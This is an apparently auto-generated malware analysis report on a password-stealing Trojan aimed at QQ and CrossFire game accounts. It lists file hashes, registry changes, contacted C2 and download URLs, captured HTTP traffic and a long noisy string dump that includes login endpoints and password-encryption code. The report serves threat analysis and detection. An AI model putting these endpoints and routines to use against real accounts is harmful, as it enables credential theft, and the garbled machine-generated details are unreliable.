Gen.Variant.Strictor.112670_68a2c81c8b

by malwarelabrobot on May 27th, 2017 in Malware Descriptions.

Gen:Variant.Strictor.112670 (BitDefender), Trojan:Win32/Tonmye (Microsoft), Trojan.Win32.Generic!BT (VIPRE), Gen:Variant.Strictor.112670 (B) (Emsisoft), Artemis!68A2C81C8B06 (McAfee), ML.Attribute.HighConfidence (Symantec), Gen:Variant.Strictor.112670 (FSecure), Generic_r.JKY (AVG), Win32:Ramnit-DJ (Avast), Gen:Variant.Strictor.112670 (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Worm, EmailWorm


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 68a2c81c8b062f292e8291458a7a274b
SHA1: fcd21cb0ecc45a6c3624c519f20d8265139ff680
SHA256: 2c0407ad77e5ab2aa685aed10d0c3697f4f4b0c98f975274ad5dec3484fed2ca
SSDeep: 49152:sxZuPheQvDLtVSOppdIVMLWpCHcDzmm7q0FCKgMd6xTnce/:UgPIQXtVSOppdGpCHYzmyfCTMwxTnce
Size: 2171392 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2016-05-18 05:09:22
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan-PSW. Trojan program intended for stealing users passwords.

Payload

Behaviour Description
EmailWorm Worm can send e-mails.


Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:2712

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:2712 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\4OBULSVD.txt (128 bytes)
C:\exdui.dll (110 bytes)

Registry activity

The process %original file name%.exe:2712 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\68a2c81c8b062f292e8291458a7a274b_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\68a2c81c8b062f292e8291458a7a274b_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\68a2c81c8b062f292e8291458a7a274b_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\68a2c81c8b062f292e8291458a7a274b_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\68a2c81c8b062f292e8291458a7a274b_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\68a2c81c8b062f292e8291458a7a274b_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\68a2c81c8b062f292e8291458a7a274b_RASAPI32]
"EnableFileTracing" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

Dropped PE files

MD5 File path
c472335b008c5942ec8a162177058111 c:\exdui.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: Leesin
Product Name: CF????
Product Version: 2.4.9.0
Legal Copyright: http://www.cfzhushou.com
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2.4.9.0
File Description: CF????
Comments: CF????
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
UPX0 4096 2523136 0 0 d41d8cd98f00b204e9800998ecf8427e
UPX1 2527232 2068480 2064896 5.46784 c31dde20dd6bad235c1c020c7f533ede
.rsrc 4595712 49152 47616 3.74594 4f6599fa4e8689ba4e5accb27700e998
.rmnet 4644864 61440 57856 0.408493 0fc2142db650f17e00240151f2b6429e

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://note.youdao.com/yws/public/note/47e1d0e04e8a224cbc6eedb4d182fd1a?keyfrom=public
hxxp://count.knowsky.com/count2/count.asp?id=85436&sx=1&ys=43 112.124.34.135
hxxp://leesin1.zichaob.com/cf.txt 111.73.46.47
time.windows.com 13.79.239.69
dns.msftncsi.com 131.107.255.255


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Unsupported/Fake Windows NT Version 5.0

Traffic

GET /count2/count.asp?id=85436&sx=1&ys=43 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: count.knowsky.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 26 May 2017 20:10:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 687
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCBBASSB=HEIEIKDAHFEKJKENNPDDJFIH; path=/
Cache-control: private
document.write('<a href=hXXp://count.knowsky.com target=_blank titl
e=..........8241
..........29774830
..............><img 
border=0 src=hXXp://count.knowsky.com/img/43/2.gif><img border=0
 src=hXXp://count.knowsky.com/img/43/9.gif><img border=0 src=htt
p://count.knowsky.com/img/43/7.gif><img border=0 src=hXXp://coun
t.knowsky.com/img/43/7.gif><img border=0 src=hXXp://count.knowsk
y.com/img/43/4.gif><img border=0 src=hXXp://count.knowsky.com/im
g/43/8.gif><img border=0 src=hXXp://count.knowsky.com/img/43/3.g
if><img border=0 src=hXXp://count.knowsky.com/img/43/0.gif>&l
t;/a><iframe frameBorder=no scrolling=no name=abc width=0 height
=0 src=hXXp://count.knowsky.com/js.asp></iframe>')HTTP/1.1 20
0 OK..Date: Fri, 26 May 2017 20:10:16 GMT..Server: Microsoft-IIS/6.0..
X-Powered-By: ASP.NET..Content-Length: 687..Content-Type: text/html..S
et-Cookie: ASPSESSIONIDCCBBASSB=HEIEIKDAHFEKJKENNPDDJFIH; path=/..Cach
e-control: private..document.write('<a href=hXXp://count.knowsky.co
m target=_blank title=..........8241
..........29774830
......
........><img border=0 src=hXXp://count.knowsky.com/img/43/2.gif
><img border=0 src=hXXp://count.knowsky.com/img/43/9.gif><
img border=0 src=hXXp://count.knowsky.com/img/43/7.gif><img bord
er=0 src=hXXp://count.knowsky.com/img/43/7.gif><img border=0 src
=hXXp://count.knowsky.com/img/43/4.gif><img border=0 src=hXXp://
count.knowsky.com/img/43/8.gif><img border=0 src=hXXp://coun
<<< skipped >>>


GET /yws/public/note/47e1d0e04e8a224cbc6eedb4d182fd1a?keyfrom=public HTTP/1.1
Accept: */*
Referer: hXXp://note.youdao.com/yws/public/note/47e1d0e04e8a224cbc6eedb4d182fd1a?keyfrom=public
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: note.youdao.com
Cache-Control: no-cache


HTTP/1.1 500 Internal Server Error
Server: Tengine
Date: Fri, 26 May 2017 20:08:24 GMT
Content-Type: text/json; charset=UTF-8
Content-Length: 244
Connection: keep-alive
RES-CODE: 1007
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: zh-CN
Set-Cookie: OUTFOX_SEARCH_USER_ID=-2031401031@10.120.182.17; expires=Sun, 19-May-2047 20:08:24 GMT
{"canTryAgain":false,"scope":"PREVIOUS_EXCEPTION","error":"1007","mess
age":"Message[SHARE_BANNED_EXCEPTION]: Public shared file is banned, u
serId=qq6DF15761F9622C1DB6F9E3D3D8BAAF16, fileId=WEBedc0845ba5c5978c6e
44ce0591a39d34","objectUser":null}HTTP/1.1 500 Internal Server Error..
Server: Tengine..Date: Fri, 26 May 2017 20:08:24 GMT..Content-Type: te
xt/json; charset=UTF-8..Content-Length: 244..Connection: keep-alive..R
ES-CODE: 1007..Pragma: no-cache..Cache-Control: no-cache, no-store, mu
st-revalidate..Expires: Thu, 01 Jan 1970 00:00:00 GMT..Content-Languag
e: zh-CN..Set-Cookie: OUTFOX_SEARCH_USER_ID=-2031401031@10.120.182.17;
 expires=Sun, 19-May-2047 20:08:24 GMT..{"canTryAgain":false,"scope":"
PREVIOUS_EXCEPTION","error":"1007","message":"Message[SHARE_BANNED_EXC
EPTION]: Public shared file is banned, userId=qq6DF15761F9622C1DB6F9E3
D3D8BAAF16, fileId=WEBedc0845ba5c5978c6e44ce0591a39d34","objectUser":n
ull}..

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_2712:

`.rsrc
.rmnet
th.Ux
yh.Ux
wh.Ux
xh.Ux
qh.Ux
t$(SSh
~%UVW
u$SShe
Jiu2.iu
K(.wS
gdiplus.dll
user32.dll
kernel32.dll
ntdll.dll
Kernel32.dll
GdiPlus.dll
wininet.dll
ole32.dll
ws2_32.dll
User32.dll
shell32.dll
Ole32.dll
OleAut32.dll
CF_Updata.dll
atl.dll
gzip.dll
urlmon
gdi32.dll
Gdi32.dll
imm32.dll
OLEACC.DLL
GetProcessHeap
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
MsgWaitForMultipleObjects
GetAsyncKeyState
GdipSetStringFormatHotkeyPrefix
RegisterHotKey
UnregisterHotKey
ShellExecuteA
42305932-06E6-47a5-AC79-8BDCDC58DF61
WebBrowser
?kernel32.dll
hXXp://apps.game.qq.com/CommArticle/app/reg/gdate.php
https
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
http=
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
hXXps://
hXXp://
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=
"sMsg":"
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=
1970-01-01 08:00:00
JOIN
CONFIG.SYS
DosExecPgm
Windows
1613-Windows
WindowsServicePark
1615-SQL
1631-Windows
1637-Windows
WindowsServicePack
1642-Windows
WindowsRPC
Windows2000
CommPort
NET.ACC
LANMAN\NETPROG\ADDPAK.SER
CACHE.EXE
WindowsNT
3108-NETWKSTA.SYS
CLANROOT\LOGS\FT.LOG
LAMAN.INI
3404-LAMAN.INI
NETWKSTA.SYS
3804-SCHED.LOG
3901-****
3902-****
4454-WindowsNT
4470-Windows2000
4486-WindowsNT
4488-WindowsNTServer
4696-WindowsNTServer
4697-WindowsNTWorkstation
5295-NETUS.HLP
5296-NET.HLP
5509-Windows2000
RPLDISK.SYS
$SystemRootSystem32Configetlogon.dns$
MODEM.INF
schema.ini
2.5.5.1
2.5.5.7
2.5.5.14
9851-TCP/IP
crossfire.exe
MsgBox
SysShadow.SubWnd
\exdui.dll
.rsrc
@V.Dv
.UmKm
4v %u
oft.XMLDOMnY
\dwmapi.dll
A715A0-6587-11D0-924A_20AFC7/
Leave.CoIn@alize
number is %d.
:"%s"
..0`%X
KERNEL32.DLL
ADVAPI32.dll
ATL.DLL
GDI32.dll
MSVCRT.dll
OLEAUT32.dll
SHELL32.dll
SHLWAPI.dll
USER32.dll
exdui.dll
t=.VMV
%%fnW
,7Z.in
k`%u"]
<!-- "@"
<!-- "@":1.
<!-- "#":
<Method Index="6" Name="crText" Type="@3#"/>
<Method Index="5" Name="crText" Type="@3#"/>
<Method Index="45" Name="PasswordChar" Type="@11#"/>
<Method Index="53" Name="crText" Type="@3#"/>
<Method Index="54" Name="crTextSel" Type="@3#"/>
<Method Index="14" Name="crText" Type="@3#"/>
T.ZQ2
CDKEY
CDKEY:
dC.Fq
.pQ\ a
.NaH-*
!)!!))!)-*1-(333:73_
%XE%Z
dj%d~
.PXF3
02/24/16
%4u3\2t
W.ctn
ei_E1%d
(NS[wÙ
e-.Tz
, #&')*)
-0-(0%()(
k.fb2
9%fWS2
9h.oc
".aBp
.ijWU5
w%SY<s
Wkbn%X
kEYH
&.kPd
(s.PKL
%f%%f
7".Fv
>.OsM
r.vDO
V2.4.9
\CF_data.ini
hXXp://q.qlogo.cn/headimg_dl?bs=qq&dst_uin=
hXXp://note.youdao.com/yws/public/note/47e1d0e04e8a224cbc6eedb4d182fd1a?keyfrom=public
hXXp://leesin1.zichaob.com/cf.txt
\CF_Updata.dll
.yP[=
%XX7.
i.dhG
'ASho%x
,%u9]
w5\pUWSSHh
$%FNHfI
.htbW
.Be$>;
<30.vj
.OXWh0T
AR,O%U
0FtPo
R.NL3
.QTC0
z=Q%c`H
%u5.]X
.PTJ2T
WudP
ab.Lkl%
%&'%u
dB.pn*
l0y.WD
.tCDHP
.dHu`
WV4o.Ct
EU%X_
0K.WN40
.UGP$Kr
WaM@{.wB_
<.&%C
X%C@ X
.hZM:
l%uBGX
,<C.kwFt
ininet.dll
33.cos.myq
m/1.txt
<Mozilla/4.0 (f
form-urlF
7.P|.Nr
0ZR.BI@/DE0,
O.OPP
%d&&'
 *)(''&%$$#""!!
?%*.*f
_CmdT"
.INI.HL^$=
R.MSVCRTerhC
9y.xX
9y.Phh
X%Sm'
.PAVG
(&07-034/)7
)*$-2{  
%s:%d/]
6]| 0 '.
Eh.dE7
keyw
E:\e5\
%SOCK
29\TCP"d7
qCONT.WlB
f2pn-t|/tcp;
.dyw(/cn.dx
zcÁ
Ug>Key
< 3)20,6
=.tex
cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>PAD
COMCTL32.dll
comdlg32.dll
WINMM.dll
WINSPOOL.DRV
WS2_32.dll
RegCloseKey
2.dll
.jF<J
&s_url=http://cf.qq.com/comm-htdocs/login/logincallback.htm&f_url=&ptlang=2052&ptredirect=100&aid=21000124&daid=8&j_later=0&low_login_hour=0®master=0&pt_login_type=1&pt_aid=0&pt_aaid=0&pt_light=0&pt_3rd_aid=0
&service=login&nodirect=0&ptsigx=
hXXp://ptlogin4.game.qq.com/check_sig?pttype=1&uin=
p_skey=
skey=
666666666
hXXp://apps.game.qq.com/comm-cgi-bin/content_admin/activity_center/query_role.cgi?game=cf&area=
szNick_name=
news.exe
,.Ey)
qTcp,
hXXp://wpa.qq.com/msgrd?v=3&uin=138417120&site=qq&menu=yes
hXXp://apps.game.qq.com/cf/a20141126main/getUserInfo.php?action=initQuery&sArea=
hXXp://apps.game.qq.com/cgi-bin/cf/cfvip/checkCFvipStatue.cgi?rd=0.3552593735512346&_=1459778886737
msg":"
tEXtXML:com.adobe.xmp
<rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/"
xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/"
xmlns:dc="hXXp://purl.org/dc/elements/1.1/"
xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/"
xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
xmlns:tiff="hXXp://ns.adobe.com/tiff/1.0/"
xmlns:exif="hXXp://ns.adobe.com/exif/1.0/">
<xmp:CreatorTool>Adobe Photoshop CC (Windows)</xmp:CreatorTool>
/* |xGv00|13a28bd5e87728de7241d2f04c3c02f5 */hXXp://apps.game.qq.com/cf/cfvip/doCfVip.php?action=getCfVipInfo&rd=0.16843547895445687&_=1459479795992
hXXp://apps.game.qq.com/php/tgclub/v2/user/logininfo?callback=jQuery17209628733010031283_1459773913284&_=1459773913464
ÿF8>NFFFh
ÿFV
&e_code=0&g_code=0&eas_url=http://xinyue.qq.com/act/pc/shenhanghezuoPC/&sServiceDepartment=xinyue
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=40568&sServiceDepartment=xinyue&set_info=xinyue
cdkeylist":"
119.29.144.30
&appid=15000103&js_ver=10153&js_type=1&login_sig=0nLadn6F*IOLoKBk7n-g3iCxqdCGPSIeyZhV-iaDTmCcf6BeP3DeVa3TGrAvmDod&u1=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&r=0.15214470936916769
hXXp://check.ptlogin2.qq.com/check?regmaster=&pt_tea=1&pt_vcode=1&uin=
&pt_randsalt=0&ptredirect=1&u1=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-6-1461659794871&js_ver=10153&js_type=1&login_sig=0nLadn6F*IOLoKBk7n-g3iCxqdCGPSIeyZhV-iaDTmCcf6BeP3DeVa3TGrAvmDod&pt_uistyle=20&aid=15000103&daid=5&
hXXp://ptlogin2.qq.com/login?u=
&s_url=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&f_url=&ptlang=2052&ptredirect=100&aid=1000101&daid=5&j_later=0&low_login_hour=0®master=0&pt_login_type=2&pt_aid=15000103&pt_aaid=0&pt_light=0&pt_3rd_aid=0
hXXp://ptlogin4.qzone.qq.com/check_sig?pttype=2&uin=
return binl2hex(core_md5(str2binl(s), s.length * chrsz))
return binl2str(core_md5(str2binl(s), s.length * chrsz))
function hex_hmac_md5(key, data) {
return binl2hex(core_hmac_md5(key, data))
function b64_hmac_md5(key, data) {
return binl2b64(core_hmac_md5(key, data))
function str_hmac_md5(key, data) {
return binl2str(core_hmac_md5(key, data))
for (var i = 0; i < x.length; i  = 16) {
function core_hmac_md5(key, data) {
var bkey = str2binl(key);
if (bkey.length > 16) {
bkey = core_md5(bkey, key.length * chrsz)
ipad[i] = bkey[i] ^ 909522486;
opad[i] = bkey[i] ^ 1549556828
var hash = core_md5(ipad.concat(str2binl(data)), 512   data.length * chrsz);
return core_md5(opad.concat(hash), 512   128)
for (var i = 0; i < str.length * chrsz; i  = chrsz) {
bin[i >> 5] |= (str.charCodeAt(i / chrsz) & mask) << (i % 32)
for (var i = 0; i < bin.length * 32; i  = chrsz) {
str  = String.fromCharCode((bin[i >> 5] >>> (i % 32)) & mask)
for (var i = 0; i < binarray.length * 4; i  ) {
str  = hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8   4)) & 15)   hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8)) & 15)
for (var i = 0; i < binarray.length * 4; i  = 3) {
if (i * 8   j * 6 > binarray.length * 32) {
str  = tab.charAt((triplet >> 6 * (3 - j)) & 63)
for (var i = 0; i < str.length; i = i   2) {
arr.push('\\x'   str.substr(i, 2))
arr = arr.join('');
function getEncryption(password, salt, vcode, isMd5) {
password = password || '';
var md5Pwd = isMd5 ? password: md5(password),
rsaH1 = $.RSA.rsa_encrypt(h1),
rsaH1Len = (rsaH1.length / 2).toString(16),
hexVcode = TEA.strToBytes(vcode.toUpperCase()),
vcodeLen = '000'   vcode.length.toString(16);
while (rsaH1Len.length < 4) {
TEA.initkey(s2);
var saltPwd = TEA.enAsBase64(rsaH1Len   rsaH1   TEA.strToBytes(salt)   vcodeLen   hexVcode);
TEA.initkey('');
return saltPwd.replace(/[\/\ =]/g,
'/': '-',
' ': '*',
'=': '_'
function getRSAEncryption(password, vcode, isMd5) {
var str1 = isMd5 ? password: md5(password);
var str2 = str1   vcode.toUpperCase();
var str3 = $.RSA.rsa_encrypt(str2);
$.RSA = function() {
while (z   aD < aC.length) {
t  = aC.substring(z, z   aD)   '\n';
return t   aC.substring(z, aC.length)
return '0'   t.toString(16)
return t.toString(16)
if (aG < aD.length   11) {
var aC = aD.length - 1;
var aE = aD.charCodeAt(aC--);
z.nextBytes(t)
this.dmp1 = null;
this.dmq1 = null;
this.coeff = null
if (z != null && t != null && z.length > 0 && t.length > 0) {
uv_alert('Invalid RSA public key')
return t.modPowInt(this.e, this.n)
var t = ah(aC, (this.n.bitLength()   7) >> 3);
var aD = this.doPublic(t);
var z = aD.toString(16);
if ((z.length & 1) == 0) {
N.prototype.doPublic = Y;
N.prototype.setPublic = q;
N.prototype.encrypt = r;
this.fromNumber(z, t, aC)
this.fromString(z, 256)
this.fromString(z, t)
aG = Math.floor(aC / 67108864);
if (ab && (navigator.appName == 'Microsoft Internet Explorer')) {
au.prototype.am = aA;
if (ab && (navigator.appName != 'Netscape')) {
au.prototype.am = b;
au.prototype.am = az;
au.prototype.DB = ay;
au.prototype.DM = ((1 << ay) - 1);
au.prototype.DV = (1 << ay);
au.prototype.FV = Math.pow(2, ac);
au.prototype.F1 = ac - ay;
au.prototype.F2 = 2 * ay - ac;
ar = '0'.charCodeAt(0);
ar = 'a'.charCodeAt(0);
ar = 'A'.charCodeAt(0);
return ag.charAt(t)
var aC = ai[z.charCodeAt(t)];
z.fromInt(t);
this.fromRadix(aG, z);
var aF = aG.length,
if (aG.charAt(aF) == '-') {
if (aE   aD > this.DB) {
this[this.t - 1] |= (t & ((1 << (this.DB - aE)) - 1)) << aE;
this[this.t  ] = (t >> (this.DB - aE))
if (aE >= this.DB) {
aE -= this.DB
this[this.t - 1] |= ((1 << (this.DB - aE)) - 1) << aE
this.clamp();
au.ZERO.subTo(this, this)
var t = this.s & this.DM;
return '-'   this.negate().toString(z)
return this.toRadix(z)
var aG = this.DB - (aD * this.DB) % aC;
if (aG < this.DB && (aH = this[aD] >> aG) > 0) {
aH |= this[--aD] >> (aG  = this.DB - aC)
aG  = this.DB; --aD
au.ZERO.subTo(this, t);
return (this.s < 0) ? this.negate() : this
return this.DB * (this.t - 1)   l(this[this.t - 1] ^ (this.s & this.DM))
z.t = Math.max(this.t - aC, 0);
var z = aH % this.DB;
var t = this.DB - z;
var aE = Math.floor(aH / this.DB),
aG = (this.s << z) & this.DM,
aD.clamp()
var aE = Math.floor(aG / this.DB);
var z = aG % this.DB;
t = Math.min(z.t, this.t);
aD[aC  ] = aE & this.DM;
aE >>= this.DB
aD[aC  ] = aE & this.DM;
aE >>= this.DB
aD[aC  ] = this.DV   aE
var t = this.abs(),
aE = z.abs();
aD[aC   t.t] = t.am(0, aE[aC], aD, aC, 0, t.t)
aD.clamp();
au.ZERO.subTo(aD, aD)
var t = this.abs();
var aD = t.am(z, t[z], aC, 2 * z, 0, 1);
if ((aC[z   t.t]  = t.am(z   1, 2 * t[z], aC, 2 * z   1, aD, t.t - z - 1)) >= t.DV) {
aC[z   t.t] -= t.DV;
aC[aC.t - 1]  = t.am(z, t[z], aC, 2 * z, 0, 1)
aC.clamp()
var aQ = aK.abs();
var aI = this.abs();
aH.fromInt(0)
this.copyTo(aG)
var aP = this.DB - l(aQ[aQ.t - 1]);
aQ.lShiftTo(aP, aE);
aI.lShiftTo(aP, aG)
aQ.copyTo(aE);
aI.copyTo(aG)
var aT = this.FV / aL,
aE.dlShiftTo(aN, aF);
if (aG.compareTo(aF) >= 0) {
aG.subTo(aF, aG)
au.ONE.dlShiftTo(aM, aF);
aF.subTo(aE, aE);
var aD = (aG[--aO] == aC) ? this.DM: Math.floor(aG[aO] * aT   (aG[aO - 1]   aR) * aS);
if ((aG[aO]  = aE.am(0, aD, aG, aN, 0, aM)) < aD) {
aE.dlShiftTo(aN, aF);
aG.subTo(aF, aG);
aG.subTo(aF, aG)
aG.drShiftTo(aM, aH);
au.ZERO.subTo(aH, aH)
aG.clamp();
aG.rShiftTo(aP, aG)
au.ZERO.subTo(aG, aG)
this.abs().divRemTo(t, null, z);
if (this.s < 0 && z.compareTo(au.ZERO) > 0) {
t.subTo(z, z)
if (t.s < 0 || t.compareTo(this.m) >= 0) {
return t.mod(this.m)
t.divRemTo(this.m, null, t)
t.multiplyTo(aC, z);
this.reduce(z)
t.squareTo(z);
M.prototype.convert = X;
M.prototype.revert = am;
M.prototype.reduce = L;
M.prototype.mulTo = J;
M.prototype.sqrTo = aw;
z = (z * (2 - t * z % this.DV)) % this.DV;
return (z > 0) ? this.DV - z: -z
this.mp = t.invDigit();
this.mpl = this.mp & 32767;
this.mph = this.mp >> 15;
this.um = (1 << (t.DB - 15)) - 1;
this.mt2 = 2 * t.t
t.abs().dlShiftTo(this.m.t, z);
z.divRemTo(this.m, null, z);
if (t.s < 0 && z.compareTo(au.ZERO) > 0) {
this.m.subTo(z, z)
t.copyTo(z);
this.reduce(z);
while (t.t <= this.mt2) {
var aD = (z * this.mpl   (((z * this.mph   (t[aC] >> 15) * this.mpl) & this.um) << 15)) & t.DM;
t[z]  = this.m.am(0, aD, t, aC, 0, this.m.t);
while (t[z] >= t.DV) {
t[z] -= t.DV;
t.clamp();
t.drShiftTo(this.m.t, t);
if (t.compareTo(this.m) >= 0) {
t.subTo(this.m, t)
g.prototype.convert = al;
g.prototype.revert = av;
g.prototype.reduce = R;
g.prototype.mulTo = B;
g.prototype.sqrTo = ao;
return au.ONE
aF = aI.convert(this),
aF.copyTo(aG);
aI.sqrTo(aG, aC);
aI.mulTo(aC, aF, aG)
return aI.revert(aG)
if (aC < 256 || t.isEven()) {
return this.exp(aC, aD)
au.prototype.copyTo = aa;
au.prototype.fromInt = p;
au.prototype.fromString = y;
au.prototype.clamp = Q;
au.prototype.dlShiftTo = at;
au.prototype.drShiftTo = Z;
au.prototype.lShiftTo = v;
au.prototype.rShiftTo = n;
au.prototype.subTo = ad;
au.prototype.multiplyTo = F;
au.prototype.squareTo = S;
au.prototype.divRemTo = G;
au.prototype.invDigit = D;
au.prototype.isEven = k;
au.prototype.exp = A;
au.prototype.toString = s;
au.prototype.negate = T;
au.prototype.abs = an;
au.prototype.compareTo = I;
au.prototype.bitLength = w;
au.prototype.mod = P;
au.prototype.modPowInt = ap;
au.ZERO = c(0);
au.ONE = c(1);
d(new Date().getTime())
if (navigator.appName == 'Netscape' && navigator.appVersion < '5' && window.crypto && window.crypto.random) {
var H = window.crypto.random(32);
for (K = 0; K < H.length;   K) {
W[ae  ] = H.charCodeAt(K) & 255
K = Math.floor(65536 * Math.random());
o.init(W);
for (ae = 0; ae < W.length;   ae) {
return o.next()
for (t = 0; t < z.length;   t) {
af.prototype.nextBytes = ax;
z = (z   this.S[aD]   aE[aD % aE.length]) & 255;
m.prototype.init = f;
m.prototype.next = a;
t.setPublic(aC, z);
return t.encrypt(aD)
return Math.round(Math.random() * 4294967295)
for (var B = 0; B < D.length; B  ) {
var C = Number(D[B]).toString(16);
if (C.length == 1) {
for (var A = 0; A < B.length; A  = 2) {
C  = String.fromCharCode(parseInt(B.substr(A, 2), 16))
for (var A = 0; A < C.length; A  ) {
B[A] = C.charCodeAt(A)
var A = C.length;
var A = E.length;
for (var C = 0; C < B.length; C  ) {
var A = u.length;
for (var B = 0; B < E.length; B  ) {
C[B] = E.charCodeAt(B) & 255
for (var B = 0; B < E.length; B  = 2) {
C[A  ] = parseInt(E.substr(B, 2), 16)
s.TEA = {
for (var B = 0; B < C.length; B  ) {
A  = String.fromCharCode(C[B])
return d.encode(A)
initkey: function(A, B) {
d.PADCHAR = '=';
d.ALPHA = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /';
d.getbyte = function(C, B) {
var A = C.charCodeAt(B);
d.encode = function(E) {
if (arguments.length != 1) {
var B = d.PADCHAR;
var G = d.ALPHA;
var F = d.getbyte;
var C = E.length - E.length % 3;
if (E.length == 0) {
A.push(G.charAt(H >> 18));
A.push(G.charAt((H >> 12) & 63));
A.push(G.charAt((H >> 6) & 63));
A.push(G.charAt(H & 63))
switch (E.length - C) {
A.push(G.charAt(H >> 18)   G.charAt((H >> 12) & 63)   B   B);
A.push(G.charAt(H >> 18)   G.charAt((H >> 12) & 63)   G.charAt((H >> 6) & 63)   B);
return A.join('')
if (!window.btoa) {
window.btoa = d.encode
var hex = str.toString(16);
var len = hex.length;
arr.push('\\x'   hex.substr(j, 2))
var result = arr.join('');
hexVcode = s.TEA.strToBytes(c.toUpperCase()),
vcodeLen = '000'   c.length.toString(16);
s.TEA.initkey(s2);
